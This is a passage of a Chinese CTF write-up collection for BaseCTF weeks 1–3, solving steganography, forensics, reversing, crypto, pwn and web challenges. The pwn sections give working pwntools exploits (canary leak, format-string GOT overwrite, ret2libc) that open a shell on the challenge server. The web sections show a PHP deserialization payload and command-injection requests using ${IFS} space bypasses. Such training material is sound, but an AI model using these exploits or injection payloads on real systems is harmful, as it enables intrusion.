Week3

MISC

Week3 外星信号

Adobe Audition打开频谱图：

1	THERE-IS-NO-FLAG-HERE-THERE-IS-NO-FLAG-HERE-THERE-IS-NO-FLAG-HERE-LET-US-GOBASECTF2EBE6FDC-60DC-

Week3 白丝上的flag

StegSolve打开，在Red plane 0下看到flag：BaseCTF{there_is_the_flag@}

Week3 纯鹿人

word文档中隐写数据cGFzc3dvcmTvvJppa3VuaWt1bg==，base解码得到：password：ikunikun

Binwalk分离出zip文件，解压得到flag

BaseCTF{d176adc7-5919-4a0c-9556-0301fc4d9c35}

Week3 broken.mp4

reference file:.-mp41.mp4

truncated file:.-mp42.mp4

BaseCTF{x1a_Ci_1_DIn9_y0Ng_MKV}

Week3 我要吃火腿！

兽语加密解码得到：

def xor_with_ham(input_file, output_file):
    ham_bytes = [0x48, 0x61, 0x6D]
    
    with open(input_file, 'rb') as f:
        data = bytearray(f.read())

    for i in range(len(data)):
        data[i] ^= ham_bytes[i % 3]

    with open(output_file, 'wb') as f:
        f.write(data)

xor_with_ham('Hamorl.jpg', 'Ham.jpg')

根据逻辑对现图片逐字节异或得到原图片

PWN

Week3 你为什么不让我溢出

canary，感觉解法很多，可以泄露栈中的Canary，也可以劫持__stack_chk_fail函数

from pwn import *
context.log_level = 'debug'

r = remote('challenge.basectf.fun', 30230)
elf = ELF('./pwn')
# gdb.attach(r,"b main")

ret = 0x000000000040101a
shell = 0x00000000004011B6

r.recvuntil(b"Hello Hacker!")
payload = b'A' * 103 + b"B" * 1
r.sendline(payload)
r.recvuntil(b"B")
canary = u64(r.recv(8)) - 0xa
print("Canary:", hex(canary))

sleep(1)
payload = b'a' * 104 + p64(canary) + b'a' * 8 + p64(ret) + p64(shell)
r.sendline(payload)

r.sendline(b"cat${IFS}flag")
r.interactive()

Week3 format_string_level2

使用fmtstr_payload时一定要注意设置arch，一开始我写的没有设置arch，出现如下报错，找了很久解决方法：

1 2	raise ValueError("pack(): number does not fit within word_size [%i, %r, %r]" % (0, number, limit)) ValueError: pack(): number does not fit within word_size [0, 140737350274416, 4294967296]

from pwn import *
from LibcSearcher import LibcSearcher

context(arch='amd64', os='linux', log_level='debug')

r = remote('challenge.basectf.fun', 28116)
elf = ELF('./format_string_level2')
# lib = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# gdb.attach(r, "b main")

r.sendline(f"%3$p")  # read
leak = int(r.recv(14), 16) - 18
print("read:", hex(leak))
libc = LibcSearcher('read', leak)
# 7 - libc6_2.35-0ubuntu3.8_amd64
libc_base = leak - libc.dump("read")
print("libc base:", hex(libc_base))
system = libc_base + libc.dump('system')

payload = fmtstr_payload(6, {elf.got["printf"]: system})
r.sendline(payload)
r.sendline(b';/bin/sh\x00')
sleep(2)
r.sendline(b"cat${IFS}flag")
r.interactive()

Week3 stack_in_stack

很经典的栈迁移，buf距离rbp 0x30，可以读0x40，故迁移至bss段

PIE

很有意思的题目

Reverse

Week3 世界上最简单的题目

GPT整理代码得到：

sequence_pattern = [1, 1, 1, 3, 1, 1, 1, 3, 1, 1, 1, 3, 1, 1, 3, 1, 1, 3, 1, 1, 3, 1, 3, 1, 3, 1, 3]  # line:6
target_ascii_values = [101, 102, 117, 120, 119, 108, 102, 124, 100, 109]  # line:7

def get_user_input():  # line:13
    return input("Please input your flag: ")  # line:14

def string_to_list(input_string):  # line:20
    return list(input_string)  # line:21

def main():  # line:27
    user_input = get_user_input()  # line:28
    xor_value = 1  # line:29
    char_index = 0  # line:30
    if len(user_input) != len(target_ascii_values):  # line:36
        print("Input length does not match.")  # line:37
        exit()  # line:38
    user_input_list = string_to_list(user_input)  # line:44
    for index in range(len(sequence_pattern)):  # line:50
        if sequence_pattern[index] == 1:  # line:51
            user_input_list[char_index] = chr(
                ord(user_input_list[char_index]) ^ xor_value)  # line:57
            xor_value += 1  # line:58
        elif sequence_pattern[index] == 3:  # line:59
            char_index += 1  # line:60
    for index in range(len(target_ascii_values)):  # line:66
        if target_ascii_values[index] != ord(user_input_list[index]):  # line:67
            print("nooooo")  # line:68
            exit()  # line:69
    print("Yes, your flag is")  # line:75
    print("BaseCTF{" + ''.join(user_input) + "}")  # line:76

if __name__ == "__main__":  # line:82
    main()  # line:83

根据代码写脚本解得flag：

sequence_pattern = [1, 1, 1, 3, 1, 1, 1, 3, 1, 1, 1, 3, 1, 1, 3, 1, 1, 3, 1, 1, 3, 1, 3, 1, 3, 1, 3]

flag_characters = [101, 102, 117, 120, 119, 108, 102, 124, 100, 109]
char_index = 9
xor_value = 18

for i in range(26, -1, -1):
    op = sequence_pattern[i]
    if op == 1:
        if char_index >= 0:
            flag_characters[char_index] = (
                flag_characters[char_index] ^ xor_value
            )
            xor_value -= 1
    elif op == 3:
        flag_characters[char_index] = flag_characters[char_index]
        char_index -= 1
        if char_index < 0:
            break

flag_characters = [chr(x) for x in flag_characters]

flag = ''.join(flag_characters)
print(f"The recovered flag is: BaseCTF{{{flag}}}")

BaseCTF{easyvmvmvm}

Week3 出题人已疯

dotpeek打开，主要逻辑在MainWindow里面，按逻辑解得原来数组：

import math

def check_input():
    input_string = [
        24164, 27173, 32145, 17867, 40533, 21647, 17418, 30032, 27950, 62998,
        60750, 64870, 52680, 61797, 49234, 59762, 16704, 19200, 32132, 24038,
        21764, 30130, 28113, 23070, 27413, 27917, 28938, 50207, 64834, 60132,
        64832, 63334, 55103, 22176, 21991, 20073, 22281, 19476, 28302, 24336,
        24720, 19544, 23018, 43976
    ]

    char_array2 = list(
        "你以为我还会在乎吗？\uD83D\uDE2C\uD83D\uDE2C\uD83D\uDE2C我在昆仑山练了六年的剑\uD83D\uDE1F\uD83D\uDE1F\uD83D\uDE1F我的心早就和昆仑山的雪一样冷了\uD83D\uDE10\uD83D\uDE10\uD83D\uDE10我在大润发杀了十年的鱼\uD83D\uDE2B\uD83D\uDE2B\uD83D\uDE2B我以为我的心早已跟我的刀一样冷了\uD83D\uDE29\uD83D\uDE29\uD83D\uDE29我早上坐公交滴卡的时候和司机大叔说“两个人”，司机惊讶地看着我“你明明就是一个人，为什么要滴两个人的卡？”我回他，“我心中还有一个叫Kengwang的。”司机回我说，“天使是不用收钱的。”（尖叫）（扭曲）（阴暗的爬行）（扭动）（阴暗地蠕动）（翻滚）（激烈地爬动）（痉挛）（嘶吼）（蠕动）（阴森的低吼）（爬行）（分裂）（走上岸）（扭曲的行走）（不分对象攻击）地球没我照样转？硬撑罢了！地球没我照样转？硬撑罢了！地球没我照样转？硬撑罢了！地球没我照样转？硬撑罢了！地球没我照样转？硬撑罢了！地球没我照样转？硬撑罢了！扭曲上勾拳！阴暗的下勾拳！尖叫左勾拳！右勾拳爬行！扭动扫堂腿！分裂回旋踢！这是蜘蛛阴暗的吃耳屎，这是龙卷风翻滚停车场！乌鸦痉挛！老鼠嘶吼！大象蠕动！愤怒的章鱼！无差别攻击！无差别攻击！无差别攻击！"
    )
    result = []

    for index in range(len(input_string)):
        xor_result = input_string[index] ^ index ^ ord(char_array2[index % len(char_array2)])
        result.append(chr(int(math.sqrt(xor_result))))

    return ''.join(result)

print(check_input())

BaseCTF{y0u_KnOw_UTF16_6uT_U_r_n0t_Cr@zym@n}

PPC

Week3 BaseCTF 崩啦 - 导言

BaseCTF{29a86c3b-8477-4deb-b089-989d0321a007}

BaseCTF{be790b01719be47428a010856dca9eea}

Week2

MISC

Week2 Base?!

XXencode解码: xxencode !!!Give your flag:BaseCTF{BaseCTF_is_So_Good!!}

Week2 二维码1-街头小广告

使用工具修复二维码扫码得到 [Week2] 二维码1-街头小广告

https://www.bilibili.com@qr.xinshi.fun/BV11k4y1X7Rj/mal1ciOus?flag=BaseCTF%7BQR_Code_1s_A_f0rM_Of_m3s5ag3%7D

BaseCTF{QR_Code_1s_A_f0rM_Of_m3s5ag3}

Week2 哇！珍德食泥鸭

解压gif文件，在word\document.xml中得到flag：

BaseCTF{a651c13d-9600-437e-90ca-40d740fa7cb4}

Week2 海上又遇了鲨鱼

导出FTP-DATA对象，得到flag.zip文件

过滤密码frame matches "PASS"

经过尝试得到压缩包密码：Ba3eBa3e!@#

BaseCTF{W1r3sharK_3at_r3p3at_paSsw0rd}

Week2 黑丝上的flag

StegSolve

Alpha plane 0

BaseCTF{Bl4ck_5ilk_1s_the_be5t}

Week2 Aura 酱的旅行日记 I <图寻擂台>

找到图片：https://cdn.mighil.com/wp-content/uploads/2023/07/IMG_6128.jpeg

地点：成都自然博物馆

1	BaseCTF{四川省成都市成华区十里店路88号}

Week2 前辈什么的最喜欢了

Base编码转图片，在Exif中得到flag

XMP-photoshop
ColorMode	RGB
TextLayerName	BaseCTF{q1n6_k4n_zh3_w0}
TextLayerText	BaseCTF{q1n6_k4n_zh3_w0}

BaseCTF{q1n6_k4n_zh3_w0}

Week2 反方向的雪

图片末尾存在多余数据

对多余数据进行倒序和翻转

def edit(input_file, output_file):
    with open(input_file, 'rb') as f_in, open(output_file, 'wb') as f_out:
        data = f_in.read()
        hex_str = data.hex()
        reversed_hex_str = hex_str[::-1]
        flipped_hex = ''
        for i in range(0, len(reversed_hex_str), 2):
            flipped_hex += reversed_hex_str[i:i+2][::-1]
        f_out.write(bytes.fromhex(flipped_hex))

edit('bin.zip', 'flag.zip')

压缩包注释：The_key_is_n0secr3t

使用ARCHPR爆破压缩包密码：123456

得到flag.txt

NO_FLAG_HERE

根据题目得知是snow隐写

1 2	SNOW.EXE -C -p "n0secr3t" flag.txt BaseCTF{Y0u_g0t_1t!}

Week2 Aura 酱的旅行日记 III <图寻擂台>

存在Exif信息，根据GPS可定位地点：四川省眉山市洪雅县瓦屋山风景区

文件名: ABFB3C5BC31941CEE10392617B2F87F4.jpg [1/4]
图片大小: 2.3MB
修改日期: 2024/08/23 21:53:29
图片信息: 4032x3024 (Jpeg,YUV420,ICC profile,sRGB)
缩放: 50%

相机制造商: vivo
相机型号: vivo X27
拍摄日期: 2023/08/01 14:03:55
闪光灯: No
焦距: 2.15mm (焦距 (35mm): 16mm)
快门速度: 0.000043s  (1/23194)
曝光偏差: -0.60 eV
光圈数: f/2.2
ISO 感光度: 50
曝光程序: Program (auto)
测光模式: Center weight
GPS 信息: N 29°40'18.48", E 102°57'7.72" , 1913.6m注释: module: a; 
hw-remosaic: 0; 
touch: (-1.0, -1.0); 
modeInfo: ; 
sceneMode: Auto; 
cct_value: 5656; 
AI_Scene: (23, -1); 
aec_lux: 82.31583; 
hist255: 0.0; 
hist252~255: 0.0; 
hist0~25: 0.0;

BaseCTF{四川省眉山市洪雅县瓦屋山风景区}

Week2 Aura 酱的旅行日记 IV <图寻擂台>

百度识图

BaseCTF{江苏省南京市秦淮区贡院街夫子庙景区}

Week2 Aura 酱的旅行日记 V <图寻擂台>

识图

1	BaseCTF{四川省广安市广安区邓小平故里-邓小平铜像广场and邓小平故居陈列馆}

Week2 Aura 酱的旅行日记 VI <图寻擂台>

1	BaseCTF{山西省太原市迎泽区青年路49号太原市第五中学校-建校时间1906年}

PWN

Week2 format_string_level0

from pwn import *
p = remote('challenge.basectf.fun',49253)
p.sendline(b"%8$s")
p.interactive()

Week2 她与你皆失

from pwn import *

context(arch='amd64', os='linux', log_level='debug')
p = remote("challenge.basectf.fun",36175)
elf = ELF('./pwn')
libc = ELF('./libc.so.6')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
start = 0x0000000000401090
pop_rdi = 0x0000000000401176
ret = 0x000000000040101a

p.recvuntil(b"I have nothing, what should I do?")
payload = b"a" * (0xA + 0X8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(start)
p.sendline(payload)

puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
log.info('addr: '+hex(puts_addr))

libc_base = puts_addr - libc.sym['puts']
bin_sh = libc_base + next(libc.search(b"/bin/sh\x00"))
system = libc_base + libc.sym['system']

p.recvuntil(b"I have nothing, what should I do?")
payload = b"a" * (0xA + 0X8) + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
p.sendline(payload)
p.sendline(b"cat${IFS}flag")

p.interactive()

WEB

Week2 ez_ser

调用链条：unserialize() -> web::__wakeup() -> re::__toString() -> pwn::__get() -> Misc::__getflag() -> system() -> web::__destruct()

<?php

class re{
    public $chu0;
}

class web {
    public $kw;
    public $dt;
}

class pwn {
    public $dusk;
    public $over;
}

class Misc {
    public $nothing;
    public $flag;
}

$misc = new Misc();

$pwn = new pwn();
$pwn->dusk = "gods";
$pwn->over = $misc;

$re = new re();
$re->chu0 = $pwn;

$web = new web();
$web->kw = $re;

echo serialize($web);

?>

BaseCTF{0322d517-7e6c-4400-a6ef-caa1c993150a}

Week2 一起吃豆豆

//结束画面
	(function () {
		var stage = game.createStage();
		//游戏结束
		stage.createItem({
			x: game.width / 2,
			y: game.height * .35,
			draw: function (context) {
				context.fillStyle = '#FFF';
				context.font = 'bold 20px PressStart2P';
				context.textAlign = 'center';
				context.textBaseline = 'middle';
				context.fillText(_LIFE ? atob("QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==") : 'GAME OVER', this.x, this.y);
			}
		});
		//记分
		stage.createItem({
			x: game.width / 2,
			y: game.height * .5,
			draw: function (context) {
				context.fillStyle = '#FFF';
				context.font = '20px PressStart2P';
				context.textAlign = 'center';
				context.textBaseline = 'middle';
				context.fillText('FINAL SCORE: ' + (_SCORE + 50 * Math.max(_LIFE - 1, 0)), this.x, this.y);
			}
		});
		//事件绑定
		stage.bind('keydown', function (e) {
			switch (e.keyCode) {
				case 13: //回车
				case 32: //空格
					_SCORE = 0;
					_LIFE = 5;
					game.setStage(1);
					break;
			}
		});
	})();

将QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==进行base解码得到flag：BaseCTF{J5_gam3_1s_easy_t0_h4ck!!}

Week2 你听不到我的声音

命令执行无回显利用

POST / HTTP/1.1
Host: challenge.basectf.fun:44943
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

cmd=cat+%2Fflag+%3E+flag

利用wget下载：wget http://challenge.basectf.fun:44943/flag

BaseCTF{d1641417-c6dc-4ce6-8d01-5ff9c2a7d63e}

Week2 Really EZ POP

调用链条：Nature::__destruct() -> Sea::__get() -> Shark::__invoke() -> Sink::__toString

Week2 RCEisamazingwithspace

POST /flag HTTP/1.1
Host: challenge.basectf.fun:43073
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 26

cmd=cat${IFS}/flag

BaseCTF{dcd98aff-21eb-4f95-82fd-8c37578ecdfa}

Week1

MISC

Week1 你也喜欢圣物吗

zsteg得到：

1	extradata:0 .. text: "RE9fWU9VX0tOT1dfRVpfTFNCPw==" //DO_YOU_KNOW_EZ_LSB?

猜测是LSB隐写，提取RGB的0通道信息，得到压缩包解压密码lud1_lud1

解压得到压缩包it is fake.zip，猜测是伪加密，通过ZipCracker修复伪加密

root@root:~/ZipCracker-main$ python3 ZipCracker.py flag.zip
                          
     ______          ____                _   [*]Hx0战队      
    |__  (_)_ __    / ___|_ __ __ _  ___| | _____ _ __ 
      / /| | '_ \  | |   | '__/ _` |/ __| |/ / _ \ '__|
     / /_| | |_) | | |___| | | (_| | (__|   <  __/ |   
    /____|_| .__/___\____|_|  \__,_|\___|_|\_\___|_|   
           |_| |_____|                                 
    #Coded By Asaotomo               Update:2024.07.15
            
[!]系统检测到 flag.zip 是一个加密的ZIP文件
[*]压缩包 flag.zip 为伪加密，系统已为您生成修复后的压缩包(fix_flag.zip)，并自动提取出1个文件：['flag.txt']

Base64解码flag.txt文件得到：flag{0h_n0_it's_f3ke}QmFzZUNURnsxdTBfcTFfeDFfNTFrMX0=

对后半段再次解码得到BaseCTF{1u0_q1_x1_51k1}

Week1 根本进不去啊!

osboxes@osboxes:~$ dig flag.basectf.fun ANY

; <<>> DiG 9.18.28-0ubuntu0.22.04.1-Ubuntu <<>> flag.basectf.fun ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 13

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;flag.basectf.fun.		IN	ANY

;; ANSWER SECTION:
flag.basectf.fun.	0	IN	TXT	"FLAG: BaseCTF{h0h0_th1s_15_dns_rec0rd}"

;; ADDITIONAL SECTION:
arlen.dnspod.net.	0	IN	A	117.89.178.173
arlen.dnspod.net.	0	IN	A	120.241.130.98
arlen.dnspod.net.	0	IN	A	129.211.176.209
arlen.dnspod.net.	0	IN	A	1.12.0.4
arlen.dnspod.net.	0	IN	A	112.80.181.45
crab.dnspod.net.	0	IN	A	1.12.0.1
crab.dnspod.net.	0	IN	A	36.155.149.176
crab.dnspod.net.	0	IN	A	112.80.181.111
crab.dnspod.net.	0	IN	A	117.89.178.184
crab.dnspod.net.	0	IN	A	129.211.176.239
arlen.dnspod.net.	0	IN	AAAA	2402:4e00:1430:1102:0:9136:2b30:e554
crab.dnspod.net.	0	IN	AAAA	2402:4e00:111:fff::c

;; Query time: 52 msec
;; SERVER: 127.0.0.53#53(127.0.0.53) (TCP)
;; WHEN: Fri Aug 16 09:04:34 EDT 2024
;; MSG SIZE  rcvd: 333

Week1 海上遇到了鲨鱼

导出HTTP对象，保存flag.php，字符串翻转得到flag

original_string = "}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB"
reversed_string = original_string[::-1]
print(f"{{{reversed_string}}}")

BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}

Week1 Base

Cyberchef解码得到

BaseCTF{we1c0me_to_b4sectf}

Week1 正着看还是反着看呢？

先对文件进行倒序和翻转

def edit(input_file, output_file):
    with open(input_file, 'rb') as f_in, open(output_file, 'wb') as f_out:
        data = f_in.read()
        hex_str = data.hex()
        reversed_hex_str = hex_str[::-1]
        flipped_hex = ''
        for i in range(0, len(reversed_hex_str), 2):
            flipped_hex += reversed_hex_str[i:i+2][::-1]
        f_out.write(bytes.fromhex(flipped_hex))

edit('flag', 'flag.jpg')

Binwalk分离图片得到flag

BaseCTF{h3ll0_h4cker}

Week1 人生苦短，我用Python

根据约束条件得到flag

1. flag的长度必须是38个字符

2. flag必须以'BaseCTF{'开头

3. flag的第10和11个字符必须是'Mp'

4. flag的最后3个字符重复8次必须等于'3x}3x}3x}3x}3x}3x}3x}3x}'

5. flag的最后一个字符的ASCII码必须是125(即'}')

6. flag中必须包含4个下划线字符'_'

7. 用'_'分割flag后,得到的5个部分长度必须分别为14,2,6,4,8

8. flag的第12、16、20、24、28个字符必须组成'lsT_n'

9. flag的前9个字符大写后用猫表情分隔必须等于'B😺A😺S😺E😺C😺T😺F😺{😺S'

10. flag倒数第11个字符必须是数字,且它的5次方等于1024(即为4)

11. flag倒数第7到倒数第4个字符base64编码后必须等于'MG1QbA=='

12. flag每隔7个字符取一个,逆序后转为十六进制必须等于'7d4372733173'

13. flag的第12、23、34个字符集合必须是{'l', 'r'}

14. flag的第21到26个字符转ASCII必须等于[116, 51, 114, 95, 84, 104]

15. flag的第17到19个字符分别乘以2024_08_15的0、1、2次方得到的结果等于41378751114180610

16. flag的第1个字符必须是字母,第9个必须是小写,第14个必须是数字

17. flag的第14和16个字符必须组成'3 1',且'3'替换为'bro'后等于'bro 1'

18. flag的SHA1哈希必须等于'e40075055f34f88993f47efb3429bd0e44a7f479'

BaseCTF{s1Mpl3_1s_BeTt3r_Th4n_C0mPl3x}

Week1 捂住X只耳

使用Audacity分离立体声到单声道，导出音频，在Adobe Audition中新建混音项目，将两端音频分别导入两条轨道，对其中一条轨道的音频进行反相效果处理，然后导出多轨混音，得到一段只有Morse Code的音频

1 2	..-. --- .-.. .-.. --- .-- -.-- --- ..- .-. .... . .- .-. - FOLLOWYOURHEART

BaseCTF{FOLLOWYOURHEART}

Week1 倒计时？海报！

1. ght} // Green plane 3
2. ev3ry_n1 // Red plane 3
3. 0_do_1t_  // Red plane 3
4. d_h@rd_t // Red plane 3
5. y_c0o1_@n // Green plane 3
6. 5_re@11 // Red plane 3
7. ery_d@y_i // Red plane 1
8. ro3_X_ev // Red plane 2
9. t_d0wn_f // Red plane 3
10. BaseCTF{c0un // Red plane 1

BaseCTF{c0unt_d0wn_fro3_X_every_d@y_i5_re@11y_c0o1_@nd_h@rd_t0_do_1t_ev3ry_n1ght}

Week1 签到！DK 盾！

微信公众号签到得到flag

BaseCTF{2024_sp0n5ored_by_dkdun}

Week1 喵喵太可爱了

1	BaseCTF{m1a0_mi@o_1s_n0t_a_b3tr4yer_t0_t3l1_the_f1ag}

Crypto

Week1 ez_math

factordb.com分离出a、b、c、d

根据题目可列出方程 \[ \text{flag} \times (1 + p_1 \times p_4 + p_2 \times p_5) = 73595299897883318809385485549070133693240974831930302408429664709375267345973630251242462442287906226820558620868020093702204534513147710406187365838820773200509683489479230005270823245 \]

\[ \text{flag} \times (p_1 + p_2 \times p_6) + c \times p_2 = 46106113894293637419638880781044700751458754728940339402825975283562443072980134956975133603010158365617690455079648357103963721564427583836974868790823082218575195867647267322046726830 \]

\[ \text{flag} \times p_2 = 161159443444728507357705839523372181165265338895748546250868368998015829266587881868060439602487400399254839839711192069105943123376622497847079185 \]

\[ a \times (p_4 + p_3 \times p_5) + b \times p_5 = 13874395612510317401724273626815493897470313869776776437748145979913315379889260408106588331541371806148807844847909 \]

\[ c \times (p_4 + p_3 \times p_5) + d \times p_5 = 11314088133820151155755028207579196628679021106024798818326096960197933616112389017957501267749946871903275867785729 \]

\[ a \times (1 + p_3 \times p_6) + b \times p_6 = 17025249852164087827929313934411832021160463738288565876371918871371314930048841650464137478757581505369909723030523 \]

\[ a \times p_3 + b = 59510107422473463833740668736202898422777415868238817665123293560097821015330 \]

\[ c \times (1 + p_3 \times p_6) + d \times p_6 = 13883500421020573457778249958402264688539607625195400103961001780695107955462968883861677871644577542226749179056659 \]

\[ c \times p_3 + d = 48528427402189936709203219516777784993195743269405968907408051071264464132448 \]

解方程得到

a = 293124197879399252223245955841307374193
b = 294816936919419198311047310603595242713
c = 239032610975319686124167120759414114611
d = 292585039548930662326103829416538145189
p3 = 203020111792196156830422191553831438169
p4 = 247964645781704461942226536615392593243
p5 = 233143514832083382411678634471120865197
p6 = 286090054102887627184069871552859027701

z3约束求解得到flag:

from z3 import *
from Crypto.Util.number import *

flag, p1, p2, c = Ints('flag p1 p2 c')
p4 = 247964645781704461942226536615392593243
p5 = 233143514832083382411678634471120865197
p6 = 286090054102887627184069871552859027701

eq1 = flag * (1 + p1 * p4 + p2 * p5) == 73595299897883318809385485549070133693240974831930302408429664709375267345973630251242462442287906226820558620868020093702204534513147710406187365838820773200509683489479230005270823245
eq2 = flag * (p1 + p2 * p6) + c * p2 == 46106113894293637419638880781044700751458754728940339402825975283562443072980134956975133603010158365617690455079648357103963721564427583836974868790823082218575195867647267322046726830
eq3 = flag * p2 == 161159443444728507357705839523372181165265338895748546250868368998015829266587881868060439602487400399254839839711192069105943123376622497847079185

s = Solver()

s.add(eq1)
s.add(eq2)
s.add(eq3)

if s.check() == sat:
    m = s.model()
    flag_value = m[flag].as_long()
    print("flag = ", long_to_bytes(flag_value))
    print("p1 = ", m[p1])
    print("p2 = ", m[p2])

BaseCTF{7E9328AF-784C-8AF5-AC10-D6A8FC0977A8}

Week1 babypack

def backpack(a, c):
    flag = []
    for i in a:
        if c - i > 0:
            flag.append(1)
            c -= i
        else:
            flag.append(0)
    print(flag)
    print(bytes.fromhex(hex(int(''.join(map(str, flag)), 2))[2:]).decode())

a= [2487264674516612702148381262059366937897201508455413114345031288894980789076145147579418259432661232747375904997965581530362268904008339124626472045717075482791021095030019783589425299870946373246221582957232862473515, 491733695728183987781854883946776199363545034763223630648303216239781071808983441788738994635864262288104702316190256147614095355462666760091586746521889127102395089946736744234701020777747486645716679961505355358205, 110323038758283816811655397189354730775114318542406507944678995133064353922234139010858233544980338693080719766808774615216332973443076471838385315798081800456260331047745824029902641504699030254172864776140503685719, 21329601123439484788549839891633989762344638209267595412456647269024794605613697213699096256470155035750114059504925376661660484839061252258268241386676023785213539005867805566800471943519247336183762390966700950019, 7146972597944713271040951137457604863561388249875746261956055482229418349264570561740906104126974792505856583850338097727129246644471065603435449813884941071413766137227119139128098345457922432088128969598942863267, 1346101131622672931978096423414991055086097907048045187836881598919564312718270178534519827267497280433625574785132174894812908583233359458000469975702103413693480199742325839719191134247009906270778775450756715188, 431832097768527518676165198802192386603746291434967601504548859319580699889723090943427634867984592194172569910901514799190511020246917662162535632202054961537707269684557393598823535364874075052250490284484829188, 140385263282271996264759155211641776877746297983736897311922733831813190094504225023609340831846735540994403916688230922925129855025970272950216444321463493579227283703118512150491635819942098587286980862817753505, 34223371325515207445588748757581712557393912157235932688701226001484995652561037930828670928779595410194265999875772181711329727812185265441887453894003309876654082495957062628413923487565276953961953102939899664, 11277905223110088306111589808536546872836546320235997789453098291242971723694602770076671423955063276020078678714571127064308764611705435202479293805661470178917099557275252963592432838615626750886647727435412727, 2615533435460831263145388899927800470846179005257762751742107113431800042995970550154282940437470113325491219189765587324789634252029440596113709555932091761129000675863727140738692649309833681187804499985953136, 936680841170458882946412959909966575946011948314629933325082014426837165501136249855420901858482634295013806361789689361684904674438042695516337484436348646919308417999556756779144910987756875858573687134864914, 240803995584844951172124454225548986410808735949094019867567366838810221297826531921690948148961695516283629928962961745839887826049348862278548294987215333063020792491250359616172365439958324315638641990190536, 74980313650452416147684959971591530004150916322659108850519926847892455755211157414650129501071119906261853154503022754482691495645170933619292755026582075009055897885581671027043347130782615603358690889357969, 17373734350550516610959609643239951947839958095899981508834140825450716407631617618229082722622331706459216379319570540046133821392793975119423828799726656124807834541043219269949459907314628636546219059231483, 4383939698435145446949414991318424065438281430941348230548310095735465803169460840233678696507780083107318568406471009158126616954496458697727524252433591785759305622568557705826283690985480130620325779855269, 1070435075033499499988967771003353861621342562651011567215908784740129578236135452228720299864117045007232989018924013752836270314752592099997410344317383430641687448457000377071747633795773722163076615405153, 354613024399513291150023928129989293929227226203084151945112636505041432337820329935805740802403361855625313123094613318180050195219366366832494130593248906011113600242755768635094775633827342114020854687801, 82597124584081826710375601757684765457467298282386480837692933784824657535317108286212691529276214884031365269733862817274058538453459456296256548913748615606422415053313052283494323168620576805637766138197, 26135834190257866104316629323550052649627679758726229473294221139854796563641126471998920211481501156701889782668173105315082084500683017294728437322818254222939692828669475566191154442279318530752996234399, 5321914533271631715766698346734309258597941523919808971175049357994196078126479079595401724485236733828962687678778457409546781470810737250537642200901652790857563365204935103019528537962033407161035692676, 1401112116815344363602973427355047116358185953451255358550792547953394603648490800732761959337994181037602301212276448178218413428984435465643957862122433848889149559184391769249005008972240636924677483332, 340703164964920022751406615239919113589733348338271455697386514814772581315065581482054968704086006813510346859307625729162886049905513425065578320526943584411252201523709613325050800852296078315276309498, 87840565476176074750781589683807196881040923233689789764972859007886298300522765664170224177346224637510402223797751637511990096677274023769380478419759017880813713095034065541851821136431753956971681001, 19670793194720557916718563116693476958260133378839723765611437953301903581689095646338017322208705125479649557618768892326788688569445543579968049624743997901012938768052637463357937838813048475700143702, 4813717864536159278344281889539442680460787707429632446095662166356039450500759565004728794684170823084248242129657936118206321365817871353015182900801593481805141407218121604733002829781487535789180828, 1042206069053701098495071546906704343612504895408542932593774355364200288153617940373728364353536406373351075906293793845088075847011440543341941529120830192687505151588415115374221938124244686599669458, 194044946903756616103043562433809500007183272927392950867023951726626302681204141127037211903589021504233703959475286805099197368181117710043885464503673129287184477006142067195426098588591382748102539, 57242060503628134854797583503415516863794342630010325140908044397602380211468806869876771678223543893631961137313994861319272460663638480876700367769402916003571424012128837346480997355093988632012775, 10220201967005002779370447788097151915347020902180766203690278038856770790331091587750957262611786369059831723020056245241984653662463224025520044810966000669665537134571188694822388194379280786606327, 3267926212173074655716273983885176036956276231571067023300127600981173234474770474267538130720791055154389260987137327011230845199160118826368874310750622421181065045300794979970673152630315803973451, 664310922264744733608679352162235206229153782441085066286192469594499932348386155418089005696350197905438895173077254739918594652439993237866669330317791070351667267902119216464673735535997917820053, 157621450510303034999027157498529810254434467859123877137482107910574969124384732028159729373548578204828393076100787322321913754468400698891584836797607004658385107761645961934718993971913922689493, 39332477720879659647769207180648194166511069149312182714850691343807294060027257884701895063257342090729165323939249852666973310856943035346466688523098612569329263778095249692454805322913109933451, 8981431226314577645818078061310516067058739244501260778838272265495867618491462415652789974290152305589437388668252286740099675804549931870318361834902625342381411139234786285243806607019356580655, 2112396066721715241251602227199629841249291526749264633946336472170358658345723532373776051582626845585398413757777914886165302637471620129930025840435283626998895529130832700898103592084193587990, 469796330799746978963007177579525242476491475859713462679382870110198758612531699613499280185379426640464846165230615898408348461001941619050157303936273348173453633557613625134687931175489772308, 115039894603762374765072518903656214032673578314477265152318302986985809844170481821167559173999270345678822988509361838537021290790266729339932399789571955857561187896624119148469524606927195502, 29664847413037439140755929162295500789926130685594096951097063583886105875553862215342779333568726148068998390489061260679772397420854474310952173916283562144502155749545173676547095974974938801, 6556839835049647931901086051581445260744766665407776927047263448383041272915616955807464961262297820118065353994454969038345182131864552405100904248845811998006038518360062998811216993218123317, 1777902487663062541759851155686901732751487652837314110752529657038468352750515100993079307083868172100714925159868062197729467104948375724637901426300367514987134187716080043905739938236648704, 496319028827230065370808145407239788641593404351668605447266421139929451476993248197319730317200648698252327668625409509842367526798038085336803728242097138638139634601057690936621540950362878, 